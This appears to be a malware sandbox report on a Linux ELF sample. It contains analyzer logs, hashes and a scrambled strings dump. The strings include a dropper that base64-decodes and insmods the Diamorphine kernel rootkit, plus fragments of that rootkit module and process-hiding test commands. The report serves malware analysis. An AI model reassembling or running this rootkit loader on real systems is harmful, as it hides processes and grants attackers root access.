Status: Clean

Analysis

Category Package Started Completed Duration Options Log(s) MalScore
FILE 2025-12-08 13:55:52 2025-12-08 13:59:58 246 seconds Show Options Show Analysis Log 3.5
vnc_port=5901
2025-12-08 05:51:54,001 [root] DEBUG: Starting analyzer from: /tmp7_5yn7x6
2025-12-08 05:51:54,002 [root] DEBUG: Storing results at: /tmp/eNwbVgsgtA
2025-12-08 05:51:54,003 [root] DEBUG: Importing auxiliary module "modules.auxiliary.auditd"...
2025-12-08 05:51:54,004 [root] DEBUG: Importing auxiliary module "modules.auxiliary.filecollector"...
2025-12-08 05:51:54,007 [root] DEBUG: Importing auxiliary module "modules.auxiliary.human"...
2025-12-08 05:51:54,008 [root] DEBUG: Importing auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 05:51:54,015 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 05:51:54,018 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-08 05:51:54,035 [root] DEBUG: Importing auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 05:51:54,036 [root] DEBUG: Importing auxiliary module "modules.auxiliary.tracee"...
2025-12-08 05:51:54,037 [root] DEBUG: Initialized auxiliary module "Auditd"
2025-12-08 05:51:54,037 [root] DEBUG: Trying to start auxiliary module "Auditd"...
2025-12-08 05:51:54,037 [root] DEBUG: Started auxiliary module "Auditd"
2025-12-08 05:51:54,038 [modules.auxiliary.filecollector] INFO: FileCollector run started
2025-12-08 05:51:54,041 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir sbin
2025-12-08 05:51:54,041 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir srv
2025-12-08 05:51:54,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir media
2025-12-08 05:51:54,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir libx32
2025-12-08 05:51:54,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp7_5yn7x6
2025-12-08 05:51:54,043 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir etc
2025-12-08 05:51:54,078 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir mnt
2025-12-08 05:51:54,078 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmpij155kl0
2025-12-08 05:51:54,079 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir boot
2025-12-08 05:51:54,081 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir cdrom
2025-12-08 05:51:54,081 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir bin
2025-12-08 05:51:54,082 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir root
2025-12-08 05:51:54,084 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir opt
2025-12-08 05:51:54,084 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir snap
2025-12-08 05:51:54,655 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp
2025-12-08 05:51:54,656 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir home
2025-12-08 05:51:54,669 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lost+found
2025-12-08 05:51:54,669 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lib32
2025-12-08 05:51:54,669 [modules.auxiliary.filecollector] INFO: FileCollector setup complete
2025-12-08 05:51:55,038 [root] DEBUG: Initialized auxiliary module "FileCollector"
2025-12-08 05:51:55,038 [root] DEBUG: Trying to start auxiliary module "FileCollector"...
2025-12-08 05:51:55,038 [root] DEBUG: Started auxiliary module "FileCollector"
2025-12-08 05:51:55,038 [modules.auxiliary.human] DEBUG: Human init complete
2025-12-08 05:51:55,038 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 05:51:55,039 [root] DEBUG: Trying to start auxiliary module "Human"...
2025-12-08 05:51:55,039 [root] DEBUG: Started auxiliary module "Human"
2025-12-08 05:51:55,039 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 05:51:55,039 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2025-12-08 05:51:55,039 [root] DEBUG: Started auxiliary module "Screenshots"
2025-12-08 05:51:55,039 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 05:51:55,039 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2025-12-08 05:51:55,052 [root] DEBUG: Started auxiliary module "Sysmon"
2025-12-08 05:51:55,052 [modules.auxiliary.tracee] INFO: docker start
2025-12-08 05:51:55,052 [root] DEBUG: Initialized auxiliary module "Docker"
2025-12-08 05:51:55,052 [root] DEBUG: Trying to start auxiliary module "Docker"...
2025-12-08 05:51:55,079 [modules.auxiliary.tracee] DEBUG: Starting docker container
2025-12-08 05:51:55,091 [modules.auxiliary.tracee] DEBUG: Attempt to remove Tracee container if it exists.
2025-12-08 05:51:55,091 [modules.auxiliary.tracee] DEBUG: sudo docker run --name tracee -d --pid=host --cgroupns=host --privileged -v /etc/os-release:/etc/os-release-host:ro -v /tmp7_5yn7x6/tracee-artifacts/:/tmp/tracee/out/host -v /var/run:/var/run:ro -v /tmp7_5yn7x6/modules/auxiliary/tracee:/policy aquasec/tracee:latest --output json --output option:parse-arguments,exec-env,exec-hash --policy /policy/policy.yml --cache cache-type=mem --cache mem-cache-size=1024 --capture bpf --capture module --capture write --signatures-dir=/policy/signatures --signatures-dir=./signatures
2025-12-08 05:51:55,317 [modules.auxiliary.tracee] DEBUG: Docker container started: b28f4776bc6b1056293688ce9296767adf7d2e3f59c2007e58b451931bd722ba

2025-12-08 05:51:55,319 [lib.common.results] INFO: File /bin/sh-shim size is 125688, Max size: 100000000
2025-12-08 05:52:05,334 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33363 size is 34, Max size: 100000000
2025-12-08 05:52:05,351 [modules.auxiliary.tracee] INFO: Try to stream
2025-12-08 05:52:05,352 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d520ee0>
2025-12-08 05:52:05,353 [modules.auxiliary.tracee] INFO: Streamstart
2025-12-08 05:52:05,353 [root] DEBUG: Started auxiliary module "Docker"
2025-12-08 05:52:05,355 [lib.core.packages] INFO: sh -c
2025-12-08 05:52:05,356 [lib.core.packages] INFO: Process will start with strace + sh-shim for Tracee's scope
2025-12-08 05:52:05,356 [lib.core.packages] INFO: sudo strace -v -o /dev/stderr -s 800  -ttf /bin/sh-shim -c "sh -c /tmp/file"
2025-12-08 05:52:05,357 [lib.core.packages] INFO: Process started
2025-12-08 05:52:05,357 [root] INFO: Added new process to list with pid: 2173
2025-12-08 05:52:05,358 [root] INFO: New child process detected: 2175
2025-12-08 05:52:05,359 [root] ERROR: Could not read memory range 7f0538974000-7f0538982000: [Errno 5] Input/output error
2025-12-08 05:52:05,360 [root] ERROR: Could not read memory range 7ffe0ce98000-7ffe0ce9c000: [Errno 5] Input/output error
2025-12-08 05:52:05,360 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2175.dmp size is 958464, Max size: 100000000
2025-12-08 05:52:05,365 [root] INFO: Added new process to list with pid: 2175
2025-12-08 05:52:05,538 [lib.common.results] INFO: File /tmp7_5yn7x6/diamorphine.ko size is 0, Max size: 100000000
2025-12-08 05:52:05,543 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-26411 size is 16061, Max size: 100000000
2025-12-08 05:52:05,563 [lib.common.results] INFO: File /tmp7_5yn7x6/diamorphine.ko size is 4096, Max size: 100000000
2025-12-08 05:52:05,565 [lib.common.results] INFO: File /tmp7_5yn7x6/diamorphine.ko size is 8192, Max size: 100000000
2025-12-08 05:52:05,567 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-8388611.inode-2490508 size is 11888, Max size: 100000000
2025-12-08 05:52:05,611 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33385 size is 77, Max size: 100000000
2025-12-08 05:52:05,617 [root] INFO: New child process detected: 2176
2025-12-08 05:52:05,665 [root] ERROR: Could not read memory range 7fff967a9000-7fff967ad000: [Errno 5] Input/output error
2025-12-08 05:52:05,666 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2176.dmp size is 19468288, Max size: 100000000
2025-12-08 05:52:05,747 [root] INFO: Added new process to list with pid: 2176
2025-12-08 05:52:05,747 [root] INFO: New child process detected: 2179
2025-12-08 05:52:05,750 [root] ERROR: Could not read memory range 7ffd105f0000-7ffd105f4000: [Errno 5] Input/output error
2025-12-08 05:52:05,750 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2179.dmp size is 2523136, Max size: 100000000
2025-12-08 05:52:05,762 [root] INFO: Added new process to list with pid: 2179
2025-12-08 05:52:05,763 [root] INFO: New child process detected: 2180
2025-12-08 05:52:05,765 [root] ERROR: Could not read memory range 7ffc2d5f4000-7ffc2d5f8000: [Errno 5] Input/output error
2025-12-08 05:52:05,765 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2180.dmp size is 2523136, Max size: 100000000
2025-12-08 05:52:05,778 [root] INFO: Added new process to list with pid: 2180
2025-12-08 05:52:05,778 [root] INFO: New child process detected: 2181
2025-12-08 05:52:05,780 [root] ERROR: Could not read memory range 7ffcfc93f000-7ffcfc943000: [Errno 5] Input/output error
2025-12-08 05:52:05,781 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2181.dmp size is 2433024, Max size: 100000000
2025-12-08 05:52:05,793 [root] INFO: Added new process to list with pid: 2181
2025-12-08 05:52:05,793 [root] INFO: New child process detected: 2182
2025-12-08 05:52:05,795 [root] ERROR: Could not read memory range 7ffd4d52d000-7ffd4d531000: [Errno 5] Input/output error
2025-12-08 05:52:05,795 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2182.dmp size is 2539520, Max size: 100000000
2025-12-08 05:52:05,808 [root] INFO: Added new process to list with pid: 2182
2025-12-08 05:52:05,808 [root] INFO: New child process detected: 2183
2025-12-08 05:52:05,835 [root] ERROR: Could not read memory range 7ffd26529000-7ffd2652d000: [Errno 5] Input/output error
2025-12-08 05:52:05,835 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2183.dmp size is 17481728, Max size: 100000000
2025-12-08 05:52:05,909 [root] INFO: Added new process to list with pid: 2183
2025-12-08 05:52:06,160 [root] INFO: New child process detected: 2187
2025-12-08 05:52:06,178 [root] ERROR: Could not read memory range 7ffd2c7dd000-7ffd2c7e1000: [Errno 5] Input/output error
2025-12-08 05:52:06,178 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2187.dmp size is 17014784, Max size: 100000000
2025-12-08 05:52:06,251 [root] INFO: Added new process to list with pid: 2187
2025-12-08 05:52:08,356 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d520ee0>
2025-12-08 05:52:08,385 [modules.auxiliary.tracee] INFO: CONTAINER ID   IMAGE                   COMMAND                  CREATED          STATUS          PORTS     NAMES
b28f4776bc6b   aquasec/tracee:latest   "/tracee/entrypoint.…"   13 seconds ago   Up 13 seconds             tracee

2025-12-08 05:52:08,407 [modules.auxiliary.tracee] INFO: sudo tail +1f /var/lib/docker/containers/b28f4776bc6b1056293688ce9296767adf7d2e3f59c2007e58b451931bd722ba/b28f4776bc6b1056293688ce9296767adf7d2e3f59c2007e58b451931bd722ba-json.log
2025-12-08 05:52:08,763 [root] INFO: New child process detected: 2208
2025-12-08 05:52:08,778 [root] ERROR: Could not read memory range 7ffecb56e000-7ffecb572000: [Errno 5] Input/output error
2025-12-08 05:52:08,780 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2208.dmp size is 4304896, Max size: 100000000
2025-12-08 05:52:08,810 [root] INFO: Added new process to list with pid: 2208
2025-12-08 05:52:08,954 [lib.common.results] INFO: File /tmp7_5yn7x6/diamorphine-invisible.txt size is 3443, Max size: 100000000
Machine

Name Label Manager Started On Shutdown On
ubuntu22.04-64bit-1 ubuntu22.04-64bit-1 KVM 2025-12-08 13:55:52 2025-12-08 13:59:58

File Details

File Name
file
File Type ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=93ec5a89bd51e49699d8943e8f18e1a98953e793, for GNU/Linux 3.2.0, not stripped
File Size 33288 bytes
MD5 ca881b8404292613c9c07a3cdcbd8d0d
SHA1 2972c0d4d86b797970050944fa23d444c6bc35c7
SHA256 f7ce60e49214f3d587e9ed26a1d3a9814552a9e00048f8c538d2cb91a46c1281
SHA3-384 d51278a94f8cbdaa967255f12680948b424f3494bcda85c204bf862d29a02ec646ead53157c937e155f88238e3bb413d
CRC32 09450E13
TLSH T19BE2517741D5FEEACF281934804633308DBDBE474774C35ABB8438A927E72909E189B9
Ssdeep 384:f1EhUMkc0/QAJsDVX43eVUH7XAV6OcLyNDjRSqF9km:GhUMkc0oACDRO7XA9xjwKKm

__init_array_end
.rodata
AAAAADHAw2ZmLg8fhAAAAAAAZpDoAAAAAEiLBQAAAABVSIsQSInlSMdCCAAAAABIiQUAAAAASIkV
.gnu.hash
AAAAADHSSIkFAAAAAGaJFQAAAABIxwAAAAAAMcDDi09wSMfCAAAAAOsIO4gAAQAAdCZIi4LIBwAA
/3QLVUiJ5eiO+///XcMxwMNmDx+EAAAAAADoAAAAAFVIieXoAAAAAEiFwHQoSMdACAAAAABIicdI
.symtab
.dynsym
.plt.sec
B+AAAAAAa2FsbHN5bXNfbG9va3VwX25hbWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ZWxhLnBhcmFpbnN0cnVjdGlvbnMALm1vZGluZm8AX192ZXJzaW9ucwAuZGF0YQAucmVsYV9fYnVn
.comment
AAAAAAAAAAAAAAD8AgAAAAAAAAQAAAA9AAAA/P////////+FAwAAAAAAAAQAAAAqAAAA/P//////
pclose
__do_global_dtors_aux
.fini_array
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGlhbW9ycGhpbmVfc2VjcmV0AGlu
__TMC_END__
[]A\A]A^A_
AAAAAK3eSIkFAAAAAEiDwCJIiQUAAAAA6AAAAABIixUAAAAASMcFAAAAAAAAAABIi4JwAgAASIkF
CEiJ5UiJEF1IuAABAAAAAK3eSIkFAAAAAEiDwCJIiQUAAAAAuAEAAABmiQUAAAAAw+gAAAAAVUjH
.data
AAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAC4AAAAHAAAAAgAAAAAAAAAAAAAAAAAAAGQAAAAA
Failed to run script
lsmod > diamorphine-visible.txt
AAAAAAAAAAAAAAAAugx6AwAAAABrZnJlZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAIADAAAAAAAA7AEAABAAAAAAAAAAAAAAAAAAAAAAAAAA9AEAABIABwAAAAAAAAAAAHUAAAAA
echo 'Hide process'
bV91c2VyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIn9uIAAAAAF9f
ABAAAAAAAAAAAAAAAAAAAAAAAAAAxAIAABIAAwAABAAAAAAAABcAAAAAAAAA2QIAABIAAwCABAAA
AAAAAAAAAAAAAAAAAAAAAAAAALPUSrQAAAAAX2NvcHlfdG9fdXNlcgAAAAAAAAAAAAAAAAAAAAAA
BQEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=
wMNVSInlSIPsEGVIiwQlKAAAAEiJRfgxwEiLBQAAAABIicJIgeL///7/DyLCSIsVAAAAAEiLDQAA
AAAABAAAAEAAAAAAAAAAAAAAAAAAAAAoIgAAAAAAAEACAAAAAAAAGAAAAAUAAAAIAAAAAAAAABgA
__frame_dummy_init_array_entry
_GLOBAL_OFFSET_TABLE_
SInl6wg5uAABAAB0GUmLgMgHAABMjYA4+P//SD0AAAAAdeJFMcBMicBdww8fhAAAAAAA6AAAAACF
.rela.dyn
cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALm5vdGUuTGludXgALnJlbGEudGV4dAAucmVsYS5pbml0
popen@@GLIBC_2.2.5
bGVfYmYAZ2l2ZV9yb290AGNvbW1pdF9jcmVkcwBmaW5kX3Rhc2sAaXNfaW52aXNpYmxlAG1vZHVs
AAMABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAMABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAMACQAAAAAA
wHQ/D7dDEEk53g+EpwAAAGZBAUUQD7dDEElj3EkBx0w5+3Y0S40cPkiNexJmRYXSdaZIuGRpYW1v
AAAAAAAAACMAAAAAAAAALAAAAAEADgBdAAAAAAAAAAkAAAAAAAAAQgAAAAEADwAAAAAAAAAAAEAE
AAAAAwAAAAAAAAD/BAAAAAAAAAIAAAAOAAAADAAAAAAAAAAKBQAAAAAAAAsAAAAsAAAACAAAAAAA
:*3$"
AAAAycMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Y2x1ZGUvbGludXgvdGhyZWFkX2luZm8uaABzeXNfY2FsbF90YWJsZQAAAAAAAAAAAAAAAAAAAAAG
AAAAAAAAAAAAPQIAABAAAAAAAAAAAAAAAAAAAAAAAAAATgIAABAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAHAAAAAAAAABRAAAAAAAAAAIAAAAOAAAAFAAAAAAAAABvAAAAAAAAAAQAAAA0AAAA/P//////
.eh_frame_hdr
czY0AG9yaWdfa2lsbABtb2R1bGVfaGlkZGVuAG1vZHVsZV9wcmV2aW91cwBkaWFtb3JwaGluZV9p
f0VMRgIBAQAAAAAAAAAAAAEAPgABAAAAAAAAAAAAAAAAAAAAAAAAALAnAAAAAAAAAAAAAEAAAAAA
AEAAGwAaAAQAAAAUAAAAAwAAAEdOVQDgCCO8fN//LdpFXFIWTcCL2ijxDQYAAAABAAAAAAEAAExp
AAAAAAAeAQAAAAAAAAQAAAA0AAAA/P////////8aAAAAAAAAAAIAAAAvAAAA/P////////8uAAAA
AAAAAAAAAAAAAAAAAAAAACYAAAAAAAAYAAAAAAAAABgAAAAMAAAACAAAAAAAAAAYAAAAAAAAAJ0A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKQvN3gAAAABfX3N0YWNrX2Noa19mYWlsAAAAAAAA
MjAuMDQuMikgOS40LjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQAAAAAAAAAAAAAA
AAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAC3AAAABAAAAEAAAAAAAAAAAAAAAAAAAAAYJgAAAAAA
__FRAME_END__
_IO_stdin_used
AACDAAAAAAAAAAIAAAAsAAAABAAAAAAAAACOAAAAAAAAAAIAAAAsAAAADAAAAAAAAACTAAAAAAAA
X2tpbGwAX2NvcHlfdG9fdXNlcgBwdl9vcHMAc2ltcGxlX3N0cnRvdWwAZ2V0X3N5c2NhbGxfdGFi
/P/////////fAAAAAAAAAAsAAAA5AAAAAAAAAAAAAAAsAQAAAAAAAAQAAAA9AAAA/P////////+1
AAAHAAAALwAAAAAAAAAkAAAAAAAAAAQAAAA3AAAA/P////////8vAAAAAAAAAAIAAAAOAAAALAAA
__libc_csu_fini
.eh_frame
_ITM_registerTMCloneTable
AAAAAAIAAAAvAAAA/P////////9UAAAAAAAAAAIAAAAOAAAAAgAAAAAAAABdAAAAAAAAAAIAAAAs
.plt.got
i33QSInaTIn26AAAAABMiffoAAAAAEiJ2EiDxBBbQVxBXUFeQV9dw0i4aW5lX3NlY3JIOUcIdZhm
cmlwdGlvbjExNgBfX1VOSVFVRV9JRF9hdXRob3IxMTUAX19VTklRVUVfSURfbGljZW5zZTExNAAu
//8AAAAAAAAAAAEAAAADAAAAAAAAAAAAAAAIAAAAAAAAAAEAAAADAAAAYAAAAAAAAAAQAAAAAAAA
__do_global_dtors_aux_fini_array_entry
AAAADAAAAAAAAABrAAAAAAAAAAIAAAAsAAAAbAIAAAAAAAByAAAAAAAAAAIAAAAOAAAADAAAAAAA
AAADAAAAEAYAAAAAAABQAAAAAAAAAAEAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAEAAAAPAAA
.note.gnu.build-id
//////+3BAAAAAAAAAQAAABAAAAA/P/////////BBAAAAAAAAAQAAAAxAAAA/P/////////jBAAA
AQAAAAAAAAQAAAAqAAAA/P/////////EAQAAAAAAAAQAAAA7AAAA/P/////////MAQAAAAAAAAQA
AAAAAAA/AAAAAAAAAAsAAAA8AAAAMAAAAAAAAABGAAAAAAAAAAIAAAAsAAAABAAAAAAAAABNAAAA
AAAAAAAAAAIAAAAOAAAAFAAAAAAAAADWAAAAAAAAAAIAAAAvAAAA/P/////////uAAAAAAAAAAsA
.note.ABI-tag
AAABAAAAAgAAAAAAAAAAAAAAAAAAACQJAAAAAAAAugAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAA
pki4ZGlhbW9ycGhIOUMTdFhJid3rzkiYSIPEEFtBXEFdQV5BX13DSIH7////f3d7ugEAAABIid5M
cat << 'EOF' | base64 --decode > diamorphine.ko
cmVkcwBrYWxsc3ltc19sb29rdXBfbmFtZQBtb2R1bGVfaGlkZQBjdXJyZW50X3Rhc2sAaGFja2Vk
cat << 'EOF' > suspicious.sh
.init
a2VkX2dldGRlbnRzAG9yaWdfZ2V0ZGVudHMAaGFja2VkX2dldGRlbnRzNjQAb3JpZ19nZXRkZW50
AAQAAAAtAAAA/P////////8BBAAAAAAAAAQAAAAxAAAA/P////////8JBAAAAAAAAAsAAAAHAAAA
__bss_start
MdLB6BRBD5TCRTHtRTH/60wx9roKAAAARIlVzOgAAAAARItVzIXAdFKJx0SJVczovf7//0SLVcyF
AAAAAAAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAYEgAAAAAAAHgGAAAAAAAAGQAAACoA
__cxa_finalize@@GLIBC_2.2.5
echo 'Diamorphine un-hidden'
.gnu.version_r
cmVkcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABerfOgAAAABw
if/orP///0mJxkyJ+E2F9g+E3gAAADHSTIn+TIn3SWPc6AAAAABIi3XQTIn6TIn36AAAAACFwA+F
AAAAAD0AAAAAAAAA4wIAABAAAAAAAAAAAAAAAAAAAAAAAAAA8AIAABIAAwAgBAAAAAAAADgAAAAA
AAAAAAIAAAAOAAAADAAAAAAAAADnBQAAAAAAAAsAAAAsAAAACAAAAAAAAADuBQAAAAAAAAIAAAAs
AAAAAAAAAAAAAAAAAADAEQAAAAAAADgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA7AAA
.gnu.version
__stack_chk_fail@@GLIBC_2.4
BgAAAAAAAAAAAAAAAAAAAN8GAAAAAAAAJwEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABF
BgAAAAAAAE8AAAAAAAAAhwIAABAAAAAAAAAAAAAAAAAAAAAAAAAAlAIAABIAAwDABAAAAAAAAAMB
7gAAAGVIiwQlAAAAAEiLgMgKAABNY+1FMdJIi0AgSItACEqLBOhIi0AYSItAMEiDeEABdQ2LQExF
AAARBQAAAAAAAAIAAAAsAAAABAAAAAAAAAAaBQAAAAAAAAIAAAAsAAAADAAAAAAAAAAhBQAAAAAA
.text
__data_start
.dynstr
.interp
DwvroA8fhAAAAAAA6AAAAABVSMfHAAAAAEiJ5egAAAAAXcNmDx+EAAAAAADoAAAAAFVJx8AAAAAA
__init_array_start
.shstrtab
completed.8061
B/8BZGVzY3JpcHRpb249TEtNIHJvb3RraXQAYXV0aG9yPW0wbmFkAGxpY2Vuc2U9RHVhbCBCU0Qv
AAQAAAAzAAAA/P////////+/AAAAAAAAAAQAAAAqAAAA/P/////////OAAAAAAAAAAQAAAArAAAA
AABIiYpwAgAASIsNAAAAAEiJisgGAABIiw0AAAAASImK8AEAAA8iwEiLRfhlSDMEJSgAAAB0BegA
bash -c '%s'
pclose@@GLIBC_2.2.5
AAAAAAAAAAAAAAAAsQAAAAEAAAADAAAAAAAAAAAAAAAAAAAAIA4AAAAAAAAAAAAAAAAAAAAAAAAA
ckg5Rwh1mGaBfxBldHWQ6Uz///8Pt9BJjTQGTIn3RIlVzEEp1Elj3EiJ2ugAAAAARItVzOlD////
SI2QOPj//0g9AAAAAHXiuP3///9dw+gAAAAAMcBdw0iF0nTrgbBc+P//AAAAEDHAXcNIiwUAAAAA
AAAAAAIAAAAOAAAALAAAAAAAAAA1AAAAAAAAAAIAAAAOAAAAJAAAAAAAAABDAAAAAAAAAAIAAAAO
Nl9pbmRpcmVjdF90aHVua19yYXgAX19zdGFja19jaGtfZmFpbABpbml0X3Rhc2sAcHJlcGFyZV9j
AAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAFgAAAAAAAAAAAAAAAAAAAAAA
DAAAAAAAAABDBgAAAAAAAAIAAAAsAAAABAAAAAAAAABOBgAAAAAAAAIAAAAsAAAADAAAAAAAAABa
BgAAAAAAAAIAAAAOAAAABAAAAAAAAAABAAAAAAAAAAQAAAAxAAAA/P////////8JAAAAAAAAAAsA
Y2hlY2tfb2JqZWN0X3NpemUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXMmi
AAAAAAAAAAAAAAAAAAAAAAMACwAAAAAAAAAAAAAAAAAAAAAAAAAAAAMADAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK0/L8AAAAAGNvbW1pdF9j
BQAAAAAAAAIAAAAsAAAADAAAAAAAAACGBQAAAAAAAAIAAAAsAAAABAAAAAAAAACNBQAAAAAAAAIA
AAAAAAIAAAAOAAAAFAAAAAAAAADoBAAAAAAAAAQAAAAzAAAA/P/////////xBAAAAAAAAAIAAAAO
snprintf@@GLIBC_2.2.5
__libc_csu_init
AAAAAAAAAAAAAAAwAwAAAAAAAAEAAAAuAAAAAAAAAAAAAAAALnN5bXRhYgAuc3RydGFiAC5zaHN0
AAAAAAAAAAAYCQAAAAAAAAwAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAhgAAAAQAAABA
AAAAAQAAAAAAAAAAAAAAAAAAALwAAAABAAAAAwAAAAAAAAAAAAAAAAAAACAOAAAAAAAAGAAAAAAA
.rela.plt
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGlhbW9ycGhpbmUAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sh ./suspicious.sh &
AAAAAAAAAHgmAAAAAAAAMAAAAAAAAAAYAAAAEwAAAAgAAAAAAAAAGAAAAAAAAADnAAAACAAAAAMA
deregister_tm_clones
_DYNAMIC
__stack_chk_fail
3
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj0LjYAAAAAX2NvcHlfZnJv
AAAAAAAAAAEAAAADAAAAwAQAAAAAAABAAAAAAAAAAAEAAAADAAAA0AUAAAAAAABIAAAAAAAAAAEA
TEMxAF9fY2hlY2tfb2JqZWN0X3NpemUAX2NvcHlfZnJvbV91c2VyAF9fdGhpc19tb2R1bGUAbWVt
AAEAAAADAAAAMAIAAAAAAAAYAAAAAAAAAAEAAAADAAAAAAQAAAAAAAAgAAAAAAAAAAEAAAADAAAA
BwAAAAgAAAAAAAAAGAAAAAAAAABqAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAB7CAAAAAAAAFgAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApAwAgAAAAAHNpbXBsZV9zdHJ0b3VsAAAAAAAAAAAA
ABAAAAAAAAAAAAAAAAAAAAAAAAAAzgEAABAAAAAAAAAAAAAAAAAAAAAAAAAA3gEAABEAEwAAAAAA
chmod +x suspicious.sh
echo $(ps -aux | grep suspicious.sh) > unhidden.txt
NC4wLTF1YnVudHUxfjIwLjA0LjIpIDkuNC4wAABHQ0M6IChVYnVudHUgOS40LjAtMXVidW50dTF+
IAQAAAAAAAAoAAAAAAAAAAEAAAADAAAAYAQAAAAAAAAwAAAAAAAAAAEAAAADAAAAgAQAAAAAAAA4
AAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAZQAAAAQAAABAAAAAAAAAAAAAAAAAAAAA+CQAAAAA
x0AQAAAAAEjHQBgAAAAASMdAIAAAAADoAAAAAF3DDx8A6AAAAABIi0dog/g/dCBVSInlg/hAD4SF
insmod diamorphine.ko
EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAEQAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAEwAAAAAAAAAA
__libc_start_main@@GLIBC_2.2.5
xwAAAABIieVIg+wQZUiLBCUoAAAASIlF+DHA6AAAAABBg8j/SIkFAAAAAEiFwA+E0gAAAP8UJQAA
AAAAAAAAWgAAAAEAAAAGAAAAAAAAAAAAAAAAAAAABggAAAAAAAB1AAAAAAAAAAAAAAAAAAAAAQAA
AAEAAAAwAAAAAAAAAAAAAAAAAAAAwBEAAAAAAABYAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAA
echo $(ps -aux | grep suspicious.sh) > hidden.txt
_ITM_deregisterTMCloneTable
aAIAAAAAAACzAAAAAAAAAAIAAAAOAAAAJAAAAAAAAADBAAAAAAAAAAIAAAAOAAAAHAAAAAAAAADP
perror@@GLIBC_2.2.5
